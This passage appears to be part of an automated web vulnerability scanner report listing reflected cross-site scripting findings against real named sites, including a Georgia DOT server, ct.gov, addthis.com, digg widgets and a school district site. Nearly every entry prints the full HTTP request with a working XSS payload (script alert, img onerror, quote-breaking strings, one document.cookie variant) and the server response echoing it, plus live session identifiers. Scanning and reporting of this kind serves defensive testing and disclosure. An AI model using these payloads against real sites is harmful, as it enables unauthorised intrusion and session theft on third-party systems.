Path:   /ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the name of an HTML tag. The payload b9c61><script>alert(1)</script>0f1e0b2f655 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ContractsAdministration/index.cfm%27%22--%3E%3Cb9c61><script>alert(1)</script>0f1e0b2f655/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E HTTP/1.1
Host: tomcat2.dot.state.ga.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:40:17 GMT
Content-Language: en
Server: JRun Web Server

<head><title>JRun Servlet Error</title></head><h1>404 /ContractsAdministration/index.cfm'"--><b9c61><script>alert(1)</script>0f1e0b2f655/style></script><script>netsparker(0x000010)</script></h1><body>
...[SNIP]...

3.79. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tomcat2.dot.state.ga.us
Path:   /ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the name of an HTML tag. The payload 88509><script>alert(1)</script>373ac6d3742 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C88509><script>alert(1)</script>373ac6d3742/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E HTTP/1.1
Host: tomcat2.dot.state.ga.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:40:18 GMT
Content-Language: en
Server: JRun Web Server

<head><title>JRun Servlet Error</title></head><h1>404 /ContractsAdministration/index.cfm'"--></style><88509><script>alert(1)</script>373ac6d3742/script><script>netsparker(0x000010)</script></h1><body>
...[SNIP]...

3.80. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://tomcat2.dot.state.ga.us
Path:   /ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7e73a(a)854aefedeb3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C7e73a(a)854aefedeb3/script%3E HTTP/1.1
Host: tomcat2.dot.state.ga.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:40:19 GMT
Content-Language: en
Server: JRun Web Server

<head><title>JRun Servlet Error</title></head><h1>404 /ContractsAdministration/index.cfm'"--></style></script><script>netsparker(0x000010)<7e73a(a)854aefedeb3/script></h1><body>
/ContractsAdministrat
...[SNIP]...

3.81. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tomcat2.dot.state.ga.us
Path:   /ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the name of an HTML tag. The payload ab28e><script>alert(1)</script>3b5dda7ad9c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/ab28e><script>alert(1)</script>3b5dda7ad9c/script%3E HTTP/1.1
Host: tomcat2.dot.state.ga.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:40:19 GMT
Content-Language: en
Server: JRun Web Server

<head><title>JRun Servlet Error</title></head><h1>404 /ContractsAdministration/index.cfm'"--></style></ab28e><script>alert(1)</script>3b5dda7ad9c/script></h1><body>
/ContractsAdministration/index.cfm
...[SNIP]...

3.82. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://tomcat2.dot.state.ga.us
Path:   /ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload dfa1f(a)36f06763a38 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/dfa1f(a)36f06763a38 HTTP/1.1
Host: tomcat2.dot.state.ga.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:40:20 GMT
Content-Language: en
Server: JRun Web Server

<head><title>JRun Servlet Error</title></head><h1>404 /ContractsAdministration/index.cfm'"--></style></script><script>netsparker(0x000010)</dfa1f(a)36f06763a38</h1><body>
/ContractsAdministration/ind
...[SNIP]...

3.83. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tomcat2.dot.state.ga.us
Path:   /ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 3d10f<script>alert(1)</script>a7e42a6b845 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E3d10f<script>alert(1)</script>a7e42a6b845 HTTP/1.1
Host: tomcat2.dot.state.ga.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:40:22 GMT
Content-Language: en
Server: JRun Web Server

<head><title>JRun Servlet Error</title></head><h1>404 /ContractsAdministration/index.cfm'"--></style></script><script>netsparker(0x000010)</script>3d10f<script>alert(1)</script>a7e42a6b845</h1><body>
...[SNIP]...

3.84. http://tomcat2.dot.state.ga.us/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tomcat2.dot.state.ga.us
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 837c1<script>alert(1)</script>125699d1a92 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico837c1<script>alert(1)</script>125699d1a92 HTTP/1.1
Host: tomcat2.dot.state.ga.us
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:39:46 GMT
Content-Language: en
Server: JRun Web Server

<head><title>JRun Servlet Error</title></head><h1>404 /favicon.ico837c1<script>alert(1)</script>125699d1a92</h1><body>
/favicon.ico837c1<script>alert(1)</script>125699d1a92</body>

3.85. http://widgets.digg.com/buttons/count [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 87f5c<script>alert(1)</script>9226bb4228b was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=http%3A//xss.cx/2011/04/30/dork/reflected-xss-cross-site-scripting-cwe79-capec86-ghdb-nistgov.html87f5c<script>alert(1)</script>9226bb4228b HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
Referer: http://xss.cx/2011/04/30/dork/reflected-xss-cross-site-scripting-cwe79-capec86-ghdb-nistgov.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Sat, 30 Apr 2011 22:24:53 GMT
Via: NS-CACHE: 100
Etag: "0c33a6b654e6d62cf288ba1f458bd87ea82bf50f"
Content-Length: 181
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Sat, 30 Apr 2011 22:34:52 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "http://xss.cx/2011/04/30/dork/reflected-xss-cross-site-scripting-cwe79-capec86-ghdb-nistgov.html87f5c<script>alert(1)</script>9226bb4228b", "diggs": 0});

3.86. http://www.addthis.com/bookmark.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9002f<script>alert(1)</script>3083d4231bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php9002f<script>alert(1)</script>3083d4231bf HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:29:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=4g5qhij8k24o9p54d4j1rmf2b2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1378
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.php9002f<script>alert(1)</script>3083d4231bf</strong>
...[SNIP]...

3.87. http://www.addthis.com/bookmark.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3976f"-alert(1)-"dd57272cd4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php3976f"-alert(1)-"dd57272cd4e HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:29:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=b1ej4hl7ucvfqmllv1kcth6j45; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1352
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.php3976f"-alert(1)-"dd57272cd4e";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","False",2);
gaPageTrac
...[SNIP]...

3.88. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6936b"-alert(1)-"fb8eda3eaca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php/6936b"-alert(1)-"fb8eda3eaca HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:29:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96059

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/6936b"-alert(1)-"fb8eda3eaca";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

3.89. http://www.capehenlopenschools.com/education/district/district.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.capehenlopenschools.com
Path:   /education/district/district.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d8371<script>alert(1)</script>70cf61567a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /educationd8371<script>alert(1)</script>70cf61567a0/district/district.php HTTP/1.1
Host: www.capehenlopenschools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:30:02 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: PHPSESSID=00bd9d2100f5ee0f8e08c9a122c0534d; path=/
Expires: Wed, 26 Feb 1997 08:21:57 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 2817
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
   dir="ltr">
...[SNIP]...
<div style="font-style: italic; font-size: 90%;">educationd8371<script>alert(1)</script>70cf61567a0/district/district.php</div>
...[SNIP]...

3.90. http://www.capehenlopenschools.com/education/district/district.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.capehenlopenschools.com
Path:   /education/district/district.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4a413<script>alert(1)</script>93feff35a9b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /education/district4a413<script>alert(1)</script>93feff35a9b/district.php HTTP/1.1
Host: www.capehenlopenschools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:30:04 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: PHPSESSID=86b34f1345306174fe0859e9d6644757; path=/
Expires: Wed, 26 Feb 1997 08:21:57 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 2817
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
   dir="ltr">
...[SNIP]...
<div style="font-style: italic; font-size: 90%;">education/district4a413<script>alert(1)</script>93feff35a9b/district.php</div>
...[SNIP]...

3.91. http://www.capehenlopenschools.com/education/district/district.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.capehenlopenschools.com
Path:   /education/district/district.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ff413<script>alert(1)</script>75feda46af was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /education/district/district.phpff413<script>alert(1)</script>75feda46af HTTP/1.1
Host: www.capehenlopenschools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:30:05 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: PHPSESSID=06c7d39a42592d45dacf9ec0844bc590; path=/
Expires: Wed, 26 Feb 1997 08:21:57 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 2816
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
   dir="ltr">
...[SNIP]...
<div style="font-style: italic; font-size: 90%;">education/district/district.phpff413<script>alert(1)</script>75feda46af</div>
...[SNIP]...

3.92. http://www.ct.gov/ctportal/cwp/view.asp [a parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ct.gov
Path:   /ctportal/cwp/view.asp

Issue detail

The value of the a request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29e06"><img%20src%3da%20onerror%3dalert(1)>9a33d81c68f was submitted in the a parameter. This input was echoed as 29e06"><img src=a onerror=alert(1)>9a33d81c68f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ctportal/cwp/view.asp?a=84329e06"><img%20src%3da%20onerror%3dalert(1)>9a33d81c68f&q=431930 HTTP/1.1
Host: www.ct.gov
Proxy-Connection: keep-alive
Referer: http://www.ct.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=64328189.1304117373.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=64328189.80047175.1304117373.1304117373.1304117373.1; __utmc=64328189; __utmb=64328189.1.10.1304117373

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 22:50:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 30513
Content-Type: text/html
Set-Cookie: ctportalNav%5FGID=; path=/ctportal
Set-Cookie: ctportalNav=; path=/ctportal
Set-Cookie: ctportal=LoginJumpBackTo=%2Fctportal%2Fcwp%2Fview%2Easp%3Fa%3D84329e06%22%3E%3Cimg%2520src%253da%2520onerror%253dalert%281%29%3E9a33d81c68f%26q%3D431930&AA=False&PGT=&UA=Guest&AN=&AG=&Q=CF83CBC7&ln=&TC=06108&CA=CF83CBC7&II=&TU=CF83CBC7&FN=Guest&ILO=False&rn=&NB=False&F=CE83CBC6&SSL=False&EA=&SA=False; domain=www.ct.gov; path=/ctportal
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML LANG="en-us">
   <DSFHEADER>
   <!--stopindex-->
   <HEAD>

       <!--
           This site was built with PPT DSF Technology
       Dynamic S
...[SNIP]...
<a href="/ctportal/cwp/view.asp?a=84329e06"><img src=a onerror=alert(1)>9a33d81c68f&q=431930&ctportalNav=|27188|">
...[SNIP]...

3.93. http://www.ct.gov/ctportal/cwp/view.asp [a parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ct.gov
Path:   /ctportal/cwp/view.asp

Issue detail

The value of the a request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 81838'><a>16be0a1a8e1 was submitted in the a parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ctportal/cwp/view.asp?a=84381838'><a>16be0a1a8e1&q=431930 HTTP/1.1
Host: www.ct.gov
Proxy-Connection: keep-alive
Referer: http://www.ct.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=64328189.1304117373.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=64328189.80047175.1304117373.1304117373.1304117373.1; __utmc=64328189; __utmb=64328189.1.10.1304117373

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 22:50:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 30330
Content-Type: text/html
Set-Cookie: ctportalNav%5FGID=; path=/ctportal
Set-Cookie: ctportalNav=; path=/ctportal
Set-Cookie: ctportal=LoginJumpBackTo=%2Fctportal%2Fcwp%2Fview%2Easp%3Fa%3D84381838%27%3E%3Ca%3E16be0a1a8e1%26q%3D431930&AA=False&PGT=&UA=Guest&AN=&AG=&Q=CF83CBC7&ln=&TC=06108&CA=CF83CBC7&II=&TU=CF83CBC7&FN=Guest&ILO=False&rn=&NB=False&F=CE83CBC6&SSL=False&EA=&SA=False; domain=www.ct.gov; path=/ctportal
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML LANG="en-us">
   <DSFHEADER>
   <!--stopindex-->
   <HEAD>

       <!--
           This site was built with PPT DSF Technology
       Dynamic S
...[SNIP]...
<A title='This will display page with only the content which is best suited for printing.' HREF='/ctportal/cwp/view.asp?a=84381838'><a>16be0a1a8e1&q=431930&pp=12&n=1' border=false>
...[SNIP]...

3.94. http://www.ct.gov/ctportal/site/default.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ct.gov
Path:   /ctportal/site/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3f9f"><script>alert(1)</script>e7695281779 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ctportal/site/default.asp?d3f9f"><script>alert(1)</script>e7695281779=1 HTTP/1.1
Host: www.ct.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ctportalNav%5FGID=; ctportalNav=; __utmz=64328189.1304117373.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=64328189.80047175.1304117373.1304117373.1304117373.1; ctportal=LoginJumpBackTo=%2Fctportal%2Fcwp%2Fview%2Easp%3Fa%3D84329e06%22%3E%3Cimg%2520src%253da%2520onerror%253dalert%28document%2Ecookie%29%3E9a33d81c68f%26q%3D431930&AA=False&PGT=&UA=Guest&AN=&AG=&Q=CF83CBC7&ln=&TC=06108&CA=CF83CBC7&II=&TU=CF83CBC7&FN=Guest&ILO=False&rn=&NB=False&F=CE83CBC6&SSL=False&EA=&SA=False; __utmc=64328189; __utmb=64328189.3.10.1304117373;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:31:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 30625
Content-Type: text/html
Set-Cookie: ctportal=SA=False&EA=&SSL=False&F=CE83CBC6&NB=False&rn=&II=&ILO=False&FN=Guest&TU=CF83CBC7&CA=CF83CBC7&TC=06108&ln=&AN=&AG=&Q=CF83CBC7&PGT=&UA=Guest&LoginJumpBackTo=%2Fctportal%2Fsite%2Fdefault%2Easp&AA=False; domain=www.ct.gov; path=/ctportal
Set-Cookie: ctportalNav=; path=/ctportal
Set-Cookie: ctportalNav%5FGID=; path=/ctportal
Cache-control: private


